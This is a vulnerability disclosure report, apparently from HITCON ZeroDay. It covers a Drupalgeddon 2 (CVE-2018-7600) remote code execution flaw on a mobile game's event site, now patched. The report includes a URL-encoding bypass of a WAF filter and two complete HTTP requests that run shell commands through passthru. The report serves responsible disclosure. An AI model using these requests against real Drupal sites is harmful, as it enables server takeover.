Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2019-00018
- 發信 Vendor: 英屬維京群島商瘋頭應用程式有限公司
- Title: 神魔之塔活動網站 Drupalgeddon 2 (CVE-2018-7600) RCE
- Introduction: Drupalgeddon 2 (CVE-2018-7600)
處理狀態
目前狀態
公開
Last Update : 2019/03/22
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2019/01/06 17:07:55 : 新提交 (由 Cyku 更新此狀態)
- 2019/01/06 21:23:59 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/01/07 15:12:37 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/01/07 15:12:37 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/02/26 13:43:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/03/14 18:32:21 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/03/22 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2019-00018
- 通報者:kanade86514 (Cyku)
- 風險:嚴重
- 類型:使用已知含漏洞之元件 (Using Known Vulnerable Components)
參考資料
系統使用已存在漏洞的元件,攻擊者可以利用該漏洞執行惡意指令,甚至操控系統。
漏洞說明: OWASP - Top 10 - 2017 A9 - Using Components with Known Vulnerabilities
https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities
漏洞說明: OWASP - Top 10 - 2017 A9 - Using Components with Known Vulnerabilities
https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.tosgame.com/
敘述
一如往常抽卡卡、抽抽抽
喔喔喔!有合作活動耶!
看起來網站是用 Drupal 7 架設的
檢查一下 CHANGELOG.txt (http://www.tosgame.com/CHANGELOG.txt)
"Drupal 7.34, 2014-11-19" 有點老舊,確定至少存在近期的 Drupalgeddon 2 漏洞
但是 http://www.tosgame.com/?q=user/password 顯示 "403 - Forbidden",看來是被阻擋了 QQ
簡單測試發現可能是透過 WAF 或其他手段阻擋網址中含有 "q=user" 字串 pattern 的請求
所以將 "user" 換成 URL Encode 後 "%75%73%65%72" 就可以正常請求到頁面了
剩下就是標準流程
1.建立表單快取,取得 form_build_id:
POST /?q=%75%73%65%72/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id;pwd;/sbin/ifconfig%20-a;ls%20-la HTTP/1.1
Host: www.tosgame.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Connection: close
Upgrade-Insecure-Requests: 1
form_id=user_pass&_triggering_element_name=name2.觸發 RCE 執行指令 "id;pwd;/sbin/ifconfig -a;ls -la":
POST /?q=file/ajax/name/%23value/form-6UHE4-s1H9KhzPOqPwW698vAZgS0JDfU1sAR92HBDL8 HTTP/1.1
Host: www.tosgame.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Connection: close
Upgrade-Insecure-Requests: 1
form_build_id=form-6UHE4-s1H9KhzPOqPwW698vAZgS0JDfU1sAR92HBDL8辛苦了!
修補建議
將 Drupal 7 更新至最新版本
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。